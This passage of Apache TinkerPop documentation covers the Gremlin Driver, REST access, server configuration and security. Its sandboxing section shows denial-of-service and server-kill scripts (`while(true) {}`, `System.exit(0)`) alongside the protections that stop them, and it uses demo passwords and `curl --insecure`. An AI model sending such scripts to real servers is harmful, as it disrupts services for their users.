   <groupId>org.apache.tinkerpop</groupId>
   <artifactId>gremlin-driver</artifactId>
   <version>x.y.z</version>
</dependency>
----

image:gremlin-java.png[width=175,float=left] TinkerPop3 comes equipped with a reference client for Java-based
applications.
It is referred to as Gremlin Driver, which enables applications to send requests to Gremlin Server
and get back results.

Gremlin code is sent to the server from a `Client` instance. A `Client` is created as follows:

[source,java]
----
Cluster cluster = Cluster.open(); <1>
Client client = cluster.connect(); <2>
----

<1> Opens a reference to `localhost` - note that there are many configuration options available in defining a `Cluster` object.
<2> Creates a `Client` given the configuration options of the `Cluster`.

Once a `Client` instance is ready, it is possible to issue some Gremlin:

[source,java]
----
ResultSet results = client.submit("[1,2,3,4]"); <1>
results.stream().map(i -> i.get(Integer.class) * 2); <2>

CompletableFuture<List<Result>> results = client.submit("[1,2,3,4]").all(); <3>

CompletableFuture<ResultSet> future = client.submitAsync("[1,2,3,4]"); <4>

Map<String,Object> params = new HashMap<>();
params.put("x",4);
client.submit("[1,2,3,x]", params); <5>
----

<1> Submits a script that simply returns a `List` of integers. This method blocks until the request is written to
the server and a `ResultSet` is constructed.
<2> Even though the `ResultSet` is constructed, it does not mean that the server has sent back the results (or has
even evaluated the script). The `ResultSet` is just a holder that is awaiting the results from the server.
In this case, they are streamed from the server as they arrive.
<3> Submit a script, get a `ResultSet`, then return a `CompletableFuture` that will be called when all results have been returned.
<4> Submit a script asynchronously without waiting for the request to be written to the server.
<5> Parameterized requests are considered the most efficient way to send Gremlin to the server as they can be cached,
which will boost performance and reduce resources required on the server.

Configuration
^^^^^^^^^^^^^

The following table describes the various configuration options for the Gremlin Driver:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|connectionPool.channelizer |The fully qualified classname of the client `Channelizer` that defines how to connect to the server. |`Channelizer.WebSocketChannelizer`
|connectionPool.enableSsl |Determines if SSL should be enabled or not. If enabled on the server then it must be enabled on the client. |false
|connectionPool.keyCertChainFile |The X.509 certificate chain file in PEM format. |_none_
|connectionPool.keyFile |The `PKCS#8` private key file in PEM format. |_none_
|connectionPool.keyPassword |The password of the `keyFile` if it is password-protected. |_none_
|connectionPool.maxContentLength |The maximum size in bytes of a message that can be sent to the server. This number can be no greater than the setting of the same name in the server configuration. |65536
|connectionPool.maxInProcessPerConnection |The maximum number of in-flight requests that can occur on a connection. |4
|connectionPool.maxSimultaneousUsagePerConnection |The maximum number of times that a connection can be borrowed from the pool simultaneously. |16
|connectionPool.maxSize |The maximum size of a connection pool for a host. |8
|connectionPool.maxWaitForConnection |The amount of time in milliseconds to wait for a new connection before timing out.
|3000
|connectionPool.maxWaitForSessionClose |The amount of time in milliseconds to wait for a session to close before timing out (does not apply to sessionless connections). |3000
|connectionPool.minInProcessPerConnection |The minimum number of in-flight requests that can occur on a connection. |1
|connectionPool.minSimultaneousUsagePerConnection |The minimum number of times that a connection can be borrowed from the pool simultaneously. |8
|connectionPool.minSize |The minimum size of a connection pool for a host. |2
|connectionPool.reconnectInitialDelay |The amount of time in milliseconds to wait before trying to reconnect to a dead host for the first time. |1000
|connectionPool.reconnectInterval |The amount of time in milliseconds to wait before trying to reconnect to a dead host. This interval occurs after the time specified by the `reconnectInitialDelay`. |1000
|connectionPool.resultIterationBatchSize |The override value for the size of the result batches to be returned from the server. |64
|connectionPool.trustCertChainFile |File location for an SSL certificate chain to use when SSL is enabled. If this value is not provided and SSL is enabled, the `TrustManager` will be established with a self-signed certificate which is NOT suitable for production purposes. |_none_
|hosts |The list of hosts that the driver will connect to. |localhost
|jaasEntry |Sets the `AuthProperties.Property.JAAS_ENTRY` properties for authentication to Gremlin Server. |_none_
|nioPoolSize |Size of the pool for handling request/response operations. |available processors
|password |The password to submit on requests that require authentication. |_none_
|port |The port of the Gremlin Server to connect to. The same port will be applied for all hosts. |8182
|protocol |Sets the `AuthProperties.Property.PROTOCOL` properties for authentication to Gremlin Server. |_none_
|serializer.className |The fully qualified class name of the `MessageSerializer` that will be used to communicate with the server. Note that the serializer configured on the client should be supported by the server configuration. |`GryoMessageSerializerV1d0`
|serializer.config |A `Map` of configuration settings for the serializer. |_none_
|username |The username to submit on requests that require authentication. |_none_
|workerPoolSize |Size of the pool for handling background work. |available processors * 2
|=========================================================

Please see the link:http://tinkerpop.apache.org/javadocs/x.y.z/core/org/apache/tinkerpop/gremlin/driver/Cluster.Builder.html[Cluster.Builder javadoc] to get more information on these settings.

Aliases
^^^^^^^

Scripts submitted to Gremlin Server automatically have the globally configured `Graph` and `TraversalSource` instances
made available to them. Therefore, if Gremlin Server configures two `TraversalSource` instances called "g1" and "g2"
a script can simply reference them directly as:

[source,java]
client.submit("g1.V()")
client.submit("g2.V()")

While this is an acceptable way to submit scripts, it has the downside of forcing the client to encode the server-side
variable name directly into the script being sent. If the server configuration ever changed such that "g1" became
"g100", the client-side code might require a significant amount of change.
Decoupling the script code from the
server configuration can be managed by the `alias` method on `Client` as follows:

[source,java]
Client g1Client = client.alias("g1")
Client g2Client = client.alias("g2")
g1Client.submit("g.V()")
g2Client.submit("g.V()")

The above code demonstrates how the `alias` method can be used such that the script need only contain a reference
to "g" and "g1" and "g2" are automatically rebound into "g" on the server-side.

Serialization
^^^^^^^^^^^^^

When using Gryo serialization (the default serializer for the driver), it is important that the client and server
have the same serializers configured, or else one or the other will experience serialization exceptions and
communication will fail. A discrepancy in serializer registration between client and server can happen fairly easily as
graphs will automatically include serializers on the server-side, thus leaving the client to be configured manually.
This can be done as follows:

[source,java]
GryoMapper kryo = GryoMapper.build().addRegistry(TitanIoRegistry.INSTANCE).create();
MessageSerializer serializer = new GryoMessageSerializerV1d0(kryo);
Cluster cluster = Cluster.build()
                .serializer(serializer)
                .create();
Client client = cluster.connect().init();

The above code demonstrates using the `TitanIoRegistry` which is an `IoRegistry` instance. It tells the serializer
what classes (from Titan in this case) to auto-register during serialization. Gremlin Server roughly uses this same
approach when it configures its serializers, so using this same model will ensure compatibility when making requests.

Connecting via REST
~~~~~~~~~~~~~~~~~~~

image:gremlin-rexster.png[width=225,float=left] While the default behavior for Gremlin Server is to provide a
WebSockets-based connection, it can also be configured to support link:http://en.wikipedia.org/wiki/Representational_state_transfer[REST].
The REST endpoint provides for a communication protocol familiar to most developers, with wide support across
programming languages, tools and libraries for accessing it. As a result, REST provides a fast way to get started
with Gremlin Server. It also may represent an easier upgrade path from link:http://rexster.tinkerpop.com/[Rexster]
as the API for the endpoint is very similar to Rexster's link:https://github.com/tinkerpop/rexster/wiki/Gremlin-Extension[Gremlin Extension].

Gremlin Server provides for a single REST endpoint - a Gremlin evaluator - which allows the submission of a Gremlin
script as a request. For each request, it returns a response containing the serialized results of that script.
To enable this endpoint, Gremlin Server needs to be configured with the `HttpChannelizer`, which replaces the default
`WebSocketChannelizer`, in the configuration file:

[source,yaml]
channelizer: org.apache.tinkerpop.gremlin.server.channel.HttpChannelizer

This setting is already configured in the `gremlin-server-rest-modern.yaml` file that is packaged with the Gremlin
Server distribution. To utilize it, start Gremlin Server as follows:

[source,text]
bin/gremlin-server.sh conf/gremlin-server-rest-modern.yaml

Once the server has started, issue a request.
Here's an example with link:http://curl.haxx.se/[cURL]:

[source,text]
$ curl "http://localhost:8182?gremlin=100-1"

which returns:

[source,js]
{
  "result":{"data":99,"meta":{}},
  "requestId":"0581cdba-b152-45c4-80fa-3d36a6eecf1c",
  "status":{"code":200,"attributes":{},"message":""}
}

The above example showed a `GET` operation, but the preferred method for this endpoint is `POST`:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-1\"}" "http://localhost:8182"

which returns:

[source,js]
{
  "result":{"data":99,"meta":{}},
  "requestId":"ef2fe16c-441d-4e13-9ddb-3c7b5dfb10ba",
  "status":{"code":200,"attributes":{},"message":""}
}

It is also preferred that Gremlin scripts be parameterized when possible via `bindings`:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-x\", \"bindings\":{\"x\":1}}" "http://localhost:8182"

The `bindings` argument is a `Map` of variables where the keys become available as variables in the Gremlin script.
Note that parameterization of requests is critical to performance, as repeated script compilation can be avoided on
each request.

NOTE: It is possible to pass bindings via `GET` based requests. Query string arguments prefixed with "bindings." will
be treated as parameters, where that prefix will be removed and the value following the period will become the
parameter name. In other words, `bindings.x` will create a parameter named "x" that can be referenced in the submitted
Gremlin script. The caveat is that these arguments will always be treated as `String` values. To ensure that data
types are preserved or to pass complex objects such as lists or maps, use `POST` which will at least support the
allowed JSON data types.

Finally, as Gremlin Server can host multiple `ScriptEngine` instances (e.g. `gremlin-groovy`, `nashorn`), it is
possible to define the language to utilize to process the request:

[source,text]
curl -X POST -d "{\"gremlin\":\"100-x\", \"language\":\"gremlin-groovy\", \"bindings\":{\"x\":1}}" "http://localhost:8182"

By default this value is set to `gremlin-groovy`. If using a `GET` operation, this value can be set as a query
string argument by setting the `language` key.

WARNING: Consider the size of the result of a submitted script being returned from the REST endpoint. A script
that iterates thousands of results will serialize each of those in memory into a single JSON result set. It is
quite possible that such a script will generate `OutOfMemoryError` exceptions on the server. Consider the default
WebSockets configuration, which supports streaming, if that type of use case is required.

Configuring
~~~~~~~~~~~

As mentioned earlier, Gremlin Server is configured through a YAML file. By default, Gremlin Server will look for a
file called `conf/gremlin-server.yaml` to configure itself on startup. To override this default, supply the file
to use to `bin/gremlin-server.sh` as in:

[source,text]
----
bin/gremlin-server.sh conf/gremlin-server-min.yaml
----

The `gremlin-server.sh` file also serves a second purpose. It can be used to "install" dependencies to the Gremlin
Server path. For example, to be able to configure and use other `Graph` implementations, the dependencies must be
made available to Gremlin Server. To do this, use the `-i` switch and supply the Maven coordinates for the dependency
to "install".
For example, to use Neo4j in Gremlin Server:

[source,text]
----
bin/gremlin-server.sh -i org.apache.tinkerpop neo4j-gremlin x.y.z
----

This command will "grab" the appropriate dependencies and copy them to the `ext` directory of Gremlin Server, which
will then allow them to be "used" the next time the server is started. To uninstall dependencies, simply delete them
from the `ext` directory.

The following table describes the various configuration options that Gremlin Server expects:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|authentication.className |The fully qualified classname of an `Authenticator` implementation to use. If this setting is not present, then authentication is effectively disabled. |`AllowAllAuthenticator`
|authentication.config |A `Map` of configuration settings to be passed to the `Authenticator` when it is constructed. The settings available are dependent on the implementation. |_none_
|channelizer |The fully qualified classname of the `Channelizer` implementation to use. A `Channelizer` is a "channel initializer" which Gremlin Server uses to define the type of processing pipeline to use. By allowing different `Channelizer` implementations, Gremlin Server can support different communication protocols (e.g. Websockets, Java NIO, etc.). |`WebSocketChannelizer`
|graphs |A `Map` of `Graph` configuration files where the key of the `Map` becomes the name to which the `Graph` will be bound and the value is the file name of a `Graph` configuration file. |_none_
|gremlinPool |The number of "Gremlin" threads available to execute actual scripts in a `ScriptEngine`. This pool represents the workers available to handle blocking operations in Gremlin Server. |8
|host |The name of the host to bind the server to. |localhost
|useEpollEventLoop |Try to use epoll event loops (works only on Linux) instead of Netty NIO. |false
|maxAccumulationBufferComponents |Maximum number of request components that can be aggregated for a message. |1024
|maxChunkSize |The maximum length of the content or each chunk. If the content length exceeds this value, the transfer encoding of the decoded request will be converted to 'chunked' and the content will be split into multiple `HttpContent` objects. If the transfer encoding of the HTTP request is 'chunked' already, each chunk will be split into smaller chunks if the length of the chunk exceeds this value. |8192
|maxContentLength |The maximum length of the aggregated content for a message. Works in concert with `maxChunkSize` where chunked requests are accumulated back into a single message. A request exceeding this size will return a `413 - Request Entity Too Large` status code. A response exceeding this size will raise an internal exception. |65536
|maxHeaderSize |The maximum length of all headers. |8192
|maxInitialLineLength |The maximum length of the initial line (e.g. "GET / HTTP/1.0") processed in a request, which essentially controls the maximum length of the submitted URI. |4096
|metrics.consoleReporter.enabled |Turns on console reporting of metrics. |false
|metrics.consoleReporter.interval |Time in milliseconds between reports of metrics to console. |180000
|metrics.csvReporter.enabled |Turns on CSV reporting of metrics. |false
|metrics.csvReporter.fileName |The file to write metrics to. |_none_
|metrics.csvReporter.interval |Time in milliseconds between reports of metrics to file.
|180000
|metrics.gangliaReporter.addressingMode |Set to `MULTICAST` or `UNICAST`. |_none_
|metrics.gangliaReporter.enabled |Turns on Ganglia reporting of metrics. |false
|metrics.gangliaReporter.host |Define the Ganglia host to report Metrics to. |localhost
|metrics.gangliaReporter.interval |Time in milliseconds between reports of metrics for Ganglia. |180000
|metrics.gangliaReporter.port |Define the Ganglia port to report Metrics to. |8649
|metrics.graphiteReporter.enabled |Turns on Graphite reporting of metrics. |false
|metrics.graphiteReporter.host |Define the Graphite host to report Metrics to. |localhost
|metrics.graphiteReporter.interval |Time in milliseconds between reports of metrics for Graphite. |180000
|metrics.graphiteReporter.port |Define the Graphite port to report Metrics to. |2003
|metrics.graphiteReporter.prefix |Define a "prefix" to append to metrics keys reported to Graphite. |_none_
|metrics.jmxReporter.enabled |Turns on JMX reporting of metrics. |false
|metrics.slf4jReporter.enabled |Turns on SLF4j reporting of metrics. |false
|metrics.slf4jReporter.interval |Time in milliseconds between reports of metrics to SLF4j. |180000
|plugins |A list of plugins that should be activated on server startup in the available script engines. It assumes that the plugins are in Gremlin Server's classpath. |_none_
|port |The port to bind the server to. |8182
|processors |A `List` of `Map` settings, where each `Map` represents an `OpProcessor` implementation to use along with its configuration. |_none_
|processors[X].className |The full class name of the `OpProcessor` implementation. |_none_
|processors[X].config |A `Map` containing `OpProcessor` specific configurations. |_none_
|resultIterationBatchSize |Defines the size in which the result of a request is "batched" back to the client. In other words, if set to `1`, then a result that had ten items in it would get each result sent back individually. If set to `2` the same ten results would come back in five batches of two each. |64
|scriptEngines |A `Map` of `ScriptEngine` implementations to expose through Gremlin Server, where the key is the name given by the `ScriptEngine` implementation. The key must match the name exactly for the `ScriptEngine` to be constructed. The value paired with this key is itself a `Map` of configuration for that `ScriptEngine`. |_none_
|scriptEngines.<name>.imports |A comma separated list of classes/packages to make available to the `ScriptEngine`. |_none_
|scriptEngines.<name>.staticImports |A comma separated list of "static" imports to make available to the `ScriptEngine`. |_none_
|scriptEngines.<name>.scripts |A comma separated list of script files to execute on `ScriptEngine` initialization. `Graph` and `TraversalSource` instance references produced from scripts will be stored globally in Gremlin Server, therefore it is possible to use initialization scripts to add Traversal Strategies or create entirely new `Graph` instances altogether. Instantiating a `LifeCycleHook` in a script provides a way to execute scripts when Gremlin Server starts and stops. |_none_
|scriptEngines.<name>.config |A `Map` of configuration settings for the `ScriptEngine`. These settings are dependent on the `ScriptEngine` implementation being used. |_none_
|scriptEvaluationTimeout |The amount of time in milliseconds before a script evaluation times out.
The notion of "script evaluation" refers to the time it takes for the `ScriptEngine` to do its work and *not* any additional time it takes for the result of the evaluation to be iterated and serialized. This feature can be turned off by setting the value to `0`. |30000
|serializers |A `List` of `Map` settings, where each `Map` represents a `MessageSerializer` implementation to use along with its configuration. |_none_
|serializers[X].className |The full class name of the `MessageSerializer` implementation. |_none_
|serializers[X].config |A `Map` containing `MessageSerializer` specific configurations. |_none_
|serializedResponseTimeout |The amount of time in milliseconds before a response serialization times out. The notion of "response serialization" refers to the time it takes for Gremlin Server to iterate an entire result after the script is evaluated in the `ScriptEngine`. |30000
|ssl.enabled |Determines if SSL is turned on or not. |false
|ssl.keyCertChainFile |The X.509 certificate chain file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_
|ssl.keyFile |The `PKCS#8` private key file in PEM format. If this value is not present and `ssl.enabled` is `true` a self-signed certificate will be used (not suitable for production). |_none_
|ssl.keyPassword |The password of the `keyFile` if it is password-protected. |_none_
|ssl.trustCertChainFile |Trusted certificates for verifying the remote endpoint's certificate. The file should contain an X.509 certificate chain in PEM format. A system default will be used if this setting is not present. (Not supported) |_none_
|strictTransactionManagement |Set to `true` to require `aliases` to be submitted on every request, where the `aliases` become the scope of transaction management. |false
|threadPoolBoss |The number of threads available to Gremlin Server for accepting connections. Should always be set to `1`. |1
|threadPoolWorker |The number of threads available to Gremlin Server for processing non-blocking reads and writes. |1
|writeBufferHighWaterMark |If the number of bytes in the network send buffer exceeds this value then the channel is no longer writeable, accepting no additional writes until the buffer is drained and the `writeBufferLowWaterMark` is met. |65536
|writeBufferLowWaterMark |Once the number of bytes queued in the network send buffer exceeds the `writeBufferHighWaterMark`, the channel will not become writeable again until the buffer is drained and it drops below this value. |65536
|=========================================================

NOTE: Configuration of link:http://ganglia.sourceforge.net/[Ganglia] requires an additional library that is not
packaged with Gremlin Server due to its LGPL licensing, which conflicts with TinkerPop's Apache 2.0 license. To
run Gremlin Server with Ganglia monitoring, download the `org.acplt:oncrpc` jar from
link:http://repo1.maven.org/maven2/org/acplt/oncrpc/1.0.7/[here] and copy it to the Gremlin Server `/lib` directory
before starting the server.

Security
^^^^^^^^

image:gremlin-server-secure.png[width=175,float=right] Gremlin Server provides several features that aid in the
security of the graphs that it exposes. It has built-in SSL support and a pluggable authentication framework using
link:https://en.wikipedia.org/wiki/Simple_Authentication_and_Security_Layer[SASL] (Simple Authentication and
Security Layer).
SSL options are described in the configuration settings table above, so this section will focus on\nauthentication.\n\nBy default, Gremlin Server is configured to allow all requests to be processed (i.e. no authentication). To enable\nauthentication, Gremlin Server must be configured with an `Authenticator` implementation in its YAML file. Gremlin\nServer comes packaged with an implementation called `SimpleAuthenticator`. The `SimpleAuthenticator` implements the\n`PLAIN` SASL mechanism (i.e. plain text) to authenticate a request. It validates username\/password pairs against a\ngraph database, which must be provided to it as part of the configuration.\n\n[source,yaml]\nauthentication: {\n className: org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator,\n config: {\n credentialsDb: conf\/tinkergraph-credentials.properties}}\n\nQuick Start\n+++++++++++\n\nA quick way to get started with the `SimpleAuthenticator` is to use TinkerGraph for the \"credentials graph\" and the\n\"sample\" credential graph that is packaged with the server.\n\n[source,text]\n----\n$ bin\/gremlin-server.sh conf\/gremlin-server-secure.yaml\n[INFO] GremlinServer -\n \\,,,\/\n (o o)\n-----oOOo-(3)-oOOo-----\n\n[INFO] GremlinServer - Configuring Gremlin Server from conf\/gremlin-server-secure.yaml\n...\n[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)\n[INFO] AbstractChannelizer - SSL enabled\n[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator\n[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}\n[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.\n[INFO] GremlinServer$1 - Channel started at port 8182.\n----\n\nIn addition to configuring the authenticator, `gremlin-server-secure.yaml` also enables SSL with a self-signed\ncertificate. As SSL is enabled on the server it must also be enabled on the client when connecting. To connect to\nGremlin Server with `gremlin-driver`, set the `credentials` and `enableSsl` when constructing the `Cluster`.\n\n[source,java]\nCluster cluster = Cluster.build().credentials(\"stephen\", \"password\")\n .enableSsl(true).create();\n\nIf connecting with Gremlin Console, which utilizes `gremlin-driver` for remote script execution, use the provided\n`conf\/remote-secure.yaml` file when defining the remote. 
That file contains configuration for the username and
password as well as enablement of SSL from the client side.

Similarly, Gremlin Server can be configured for REST and security.

[source,text]
----
$ bin/gremlin-server.sh conf/gremlin-server-rest-secure.yaml
[INFO] GremlinServer -
       \,,,/
       (o o)
-----oOOo-(3)-oOOo-----

[INFO] GremlinServer - Configuring Gremlin Server from conf/gremlin-server-secure.yaml
...
[WARN] AbstractChannelizer - Enabling SSL with self-signed certificate (NOT SUITABLE FOR PRODUCTION)
[INFO] AbstractChannelizer - SSL enabled
[INFO] SimpleAuthenticator - Initializing authentication with the org.apache.tinkerpop.gremlin.server.auth.SimpleAuthenticator
[INFO] SimpleAuthenticator - CredentialGraph initialized at CredentialGraph{graph=tinkergraph[vertices:1 edges:0]}
[INFO] GremlinServer$1 - Gremlin Server configured with worker thread pool of 1, gremlin pool of 8 and boss thread pool of 1.
[INFO] GremlinServer$1 - Channel started at port 8182.
----

Once the server has started, issue a request passing the credentials with an `Authorization` header, as described in link:http://tools.ietf.org/html/rfc2617#section-2[RFC2617]. Here's an HTTP Basic authentication example with cURL:

[source,text]
curl -X POST --insecure -u stephen:password -d "{\"gremlin\":\"100-1\"}" "https://localhost:8182"

[[credentials-dsl]]
Credentials Graph DSL
+++++++++++++++++++++

The "credentials graph", which has been mentioned in previous sections, is used by Gremlin Server to hold the list of
users who can authenticate to the server. It is possible to use virtually any `Graph` instance for this task as long
as it conforms to a defined schema. The credentials graph stores users as vertices with the `label` of "user". Each
"user" vertex has two properties: `username` and `password`. Naturally, these are both `String` values. The password
must not be stored in plain text and should be hashed.

IMPORTANT: Be sure to define an index on the `username` property, as this will be used for lookups. If supported by
the `Graph`, consider specifying a unique constraint as well.

To aid with the management of a credentials graph, Gremlin Server provides a Gremlin Console plugin which can be
used to add and remove users so as to ensure that the schema is adhered to, thus ensuring compatibility with Gremlin
Server. In addition, as it is a plugin, it works naturally in the Gremlin Console as an extension of its
capabilities (though one could use it programmatically, if desired). This plugin is distributed with the Gremlin
Console so it does not have to be "installed". It does, however, need to be activated:

[source,groovy]
gremlin> :plugin use tinkerpop.credentials
==>tinkerpop.credentials activated

Example usage follows:

[gremlin-groovy]
----
graph = TinkerGraph.open()
graph.createIndex("username",Vertex.class)
credentials = credentials(graph)
credentials.createUser("stephen","password")
credentials.createUser("daniel","better-password")
credentials.createUser("marko","rainbow-dash")
credentials.findUser("marko").properties()
credentials.countUsers()
credentials.removeUser("daniel")
credentials.countUsers()
----
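
Because the credentials graph is an ordinary `Graph` adhering to the schema described above, it can also be
inspected with plain Gremlin. A small sketch, assuming the `graph` variable from the example above:

[source,groovy]
g = graph.traversal()
g.V().hasLabel("user").values("username")   // list the stored usernames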

[[script-execution]]
Script Execution
++++++++++++++++

It is important to remember that Gremlin Server exposes a `ScriptEngine` instance that allows for remote execution
of arbitrary code on the server. Obviously, this situation can represent a security risk or, more minimally, provide
ways for "bad" scripts to be inadvertently executed. A simple example of a "valid" Gremlin script that would cause
some problems would be `while(true) {}`, which would consume a thread in the Gremlin pool indefinitely, thus
preventing it from serving other requests. Sending enough of these kinds of scripts would eventually consume all
available threads and Gremlin Server would stop responding.

Gremlin Server (more specifically the `GremlinGroovyScriptEngine`) provides methods to protect itself from these
kinds of troublesome scripts. A user can configure the script engine with different `CompilerCustomizerProvider`
implementations. Consider the basic configuration from the Gremlin Server YAML file:

[source,yaml]
scriptEngines: {
  gremlin-groovy: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI],
    scripts: [scripts/empty-sample.groovy]}}

This configuration can be extended to include a `config` key as follows:

[source,yaml]
scriptEngines: {
  gremlin-groovy: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI],
    scripts: [scripts/empty-sample.groovy],
    config: {
      compilerCustomizerProviders: {
        "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider":[10000] }}}

This configuration sets up the script engine with a `CompilerCustomizerProvider` implementation. The
`TimedInterruptCustomizerProvider` injects checks that ensure that loops (like `while`) can only execute for `10000`
milliseconds. With this configuration in place, a remote execution such as the following now times out rather than
consuming the thread continuously:

[source,groovy]
gremlin> :remote connect tinkerpop.server conf/remote.yaml
==>Configured localhost/127.0.0.1:8182
gremlin> :> while(true) { }
Execution timed out after 10000 units. Start time: Fri Jul 24 11:04:52 EDT 2015

There are a number of pre-packaged `CustomizerProvider` implementations:

[width="100%",cols="3,10a",options="header"]
|=========================================================
|Customizer |Description
|`CompileStaticCustomizerProvider` |Applies `CompileStatic` annotations to incoming scripts thus removing dynamic dispatch. More information about static compilation can be found in the link:http://docs.groovy-lang.org/latest/html/documentation/#_static_compilation[Groovy Documentation]. It is possible to configure this `CustomizerProvider` by specifying a comma separated list of link:http://docs.groovy-lang.org/latest/html/documentation/#Typecheckingextensions-Workingwithextensions[type checking extensions] that can have the effect of securing calls to various methods.
|`ThreadInterruptCustomizerProvider` |Injects checks for thread interruption, thus allowing the thread to potentially respect calls to `Thread.interrupt()`.
|`TimedInterruptCustomizerProvider` |Injects checks into loops to interrupt them if they exceed the configured timeout in milliseconds.
|`TypeCheckedCustomizerProvider` |Similar to the above-mentioned `CompileStaticCustomizerProvider`, the `TypeCheckedCustomizerProvider` injects `TypeChecked` annotations to incoming scripts. More information on the nature of this annotation can be found in the link:http://docs.groovy-lang.org/latest/html/documentation/#_the_code_typechecked_code_annotation[Groovy Documentation].
It too takes a comma separated list of link:http://docs.groovy-lang.org/latest/html/documentation/#Typecheckingextensions-Workingwithextensions[type checking extensions].
|=========================================================

To provide some basic out-of-the-box protections against troublesome scripts, the following configuration can be used:

[source,yaml]
scriptEngines: {
  gremlin-groovy: {
    imports: [java.lang.Math],
    staticImports: [java.lang.Math.PI],
    scripts: [scripts/empty-sample.groovy],
    config: {
      compilerCustomizerProviders: {
        "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.ThreadInterruptCustomizerProvider":[],
        "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.TimedInterruptCustomizerProvider":[10000],
        "org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.CompileStaticCustomizerProvider":["org.apache.tinkerpop.gremlin.groovy.jsr223.customizer.SimpleSandboxExtension"]}}}}

NOTE: The above configuration could also use the `TypeCheckedCustomizerProvider` in place of the
`CompileStaticCustomizerProvider`. The differences between `TypeChecked` and `CompileStatic` are beyond the scope of
this documentation. Consult the latest link:http://docs.groovy-lang.org/latest/html/documentation/#_typing[Groovy Documentation]
for information on the differences. It is important to understand the impact that these configurations will have on
submitted scripts before enabling this feature.

NOTE: The import of classes to the script engine is handled by the `ImportCustomizerProvider`. As the concept of
"imports" is a first-class citizen (i.e. has its own configuration options), it is not recommended that the
`ImportCustomizerProvider` be used as a configuration option to `compilerCustomizerProviders`.

This configuration uses the `SimpleSandboxExtension`, which blacklists calls to methods on the `System` class,
thereby preventing someone from remotely killing the server:

[source,groovy]
----
gremlin> :> System.exit(0)
Script8.groovy: 1: [Static type checking] - Not authorized to call this method: java.lang.System#exit(int)
 @ line 1, column 1.
   System.exit(0)
   ^

1 error
----

The `SimpleSandboxExtension` is by no means a "complete" implementation protecting against all manner of nefarious
scripts, but it does provide an example for how such a capability might be implemented.
A more complete implementation
is offered in the `FileSandboxExtension`, which uses a configuration file to white list certain classes and methods.
The configuration file is YAML-based and an example is presented as follows:

[source,yaml]
----
autoTypeUnknown: true
methodWhiteList:
  - java\.lang\.Boolean.*
  - java\.lang\.Byte.*
  - java\.lang\.Character.*
  - java\.lang\.Double.*
  - java\.lang\.Enum.*
  - java\.lang\.Float.*
  - java\.lang\.Integer.*
  - java\.lang\.Long.*
  - java\.lang\.Math.*
  - java\.lang\.Number.*
  - java\.lang\.Object.*
  - java\.lang\.Short.*
  - java\.lang\.String.*
  - java\.lang\.StringBuffer.*
  - java\.lang\.System#currentTimeMillis\(\)
  - java\.lang\.System#nanoTime\(\)
  - java\.lang\.Throwable.*
  - java\.lang\.Void.*
  - java\.util\..*
  - org\.codehaus\.groovy\.runtime\.DefaultGroovyMethods.*
  - org\.codehaus\.groovy\.runtime\.InvokerHelper#runScript\(java\.lang\.Class,java\.lang\.String\[\]\)
  - org\.codehaus\.groovy\.runtime\.StringGroovyMethods.*
  - groovy\.lang\.Script#<init>\(groovy.lang.Binding\)
  - org\.apache\.tinkerpop\.gremlin\.structure\..*
  - org\.apache\.tinkerpop\.gremlin\.process\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.computer\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.computer\.bulkloading\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.computer\.clustering\.peerpressure\.*
  - org\.apache\.tinkerpop\.gremlin\.process\.computer\.ranking\.pagerank\.*
  - org\.apache\.tinkerpop\.gremlin\.process\.computer\.traversal\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.traversal\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.traversal\.dsl\.graph\..*
  - org\.apache\.tinkerpop\.gremlin\.process\.traversal\.engine\..*
  - org\.apache\.tinkerpop\.gremlin\.server\.util\.LifeCycleHook.*
staticVariableTypes:
  graph: org.apache.tinkerpop.gremlin.structure.Graph
  g: org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.GraphTraversalSource
----

There are three keys in this configuration file that control different aspects of the sandbox:

. `autoTypeUnknown` - When set to `true`, unresolved variables are typed as `Object`.
. `methodWhiteList` - A white list of classes and methods that follow a regex pattern which can then be matched against
method descriptors to determine if they can be executed. The method descriptor is the fully-qualified class name
of the method, its name and parameters. For example, `Math.ceil` would have a descriptor of
`java.lang.Math#ceil(double)`.
. `staticVariableTypes` - A list of variables that will be used in the `ScriptEngine` for which the types are
always known. In the above example, the variable "graph" will always be bound to a `Graph` instance.

At Gremlin Server startup, the `FileSandboxExtension` looks in the root of the Gremlin Server installation directory
for a file called `sandbox.yaml` and configures itself. To use a file in a different location, set the
`gremlinServerSandbox` system property to the location of the file (e.g. `-DgremlinServerSandbox=conf/my-sandbox.yaml`).

The `FileSandboxExtension` provides for a basic configurable security function in Gremlin Server.
More complex
sandboxing implementations can be developed by using this white listing model and extending from the
`AbstractSandboxExtension`.

A final thought on the topic of `CompilerCustomizerProvider` implementations is that they are not just for
"security" (though they are demonstrated in that capacity here). They can be used for a variety of features that
can fine tune the Groovy compilation process. Read more about compilation customization in the
link:http://docs.groovy-lang.org/latest/html/documentation/#compilation-customizers[Groovy Documentation].

Serialization
^^^^^^^^^^^^^

Gremlin Server can accept requests and return results using different serialization formats. The format of the
serialization is configured by the `serializers` setting described in the table above. Note that some serializers
have additional configuration options as defined by the `serializers[X].config` setting. The `config` setting is a
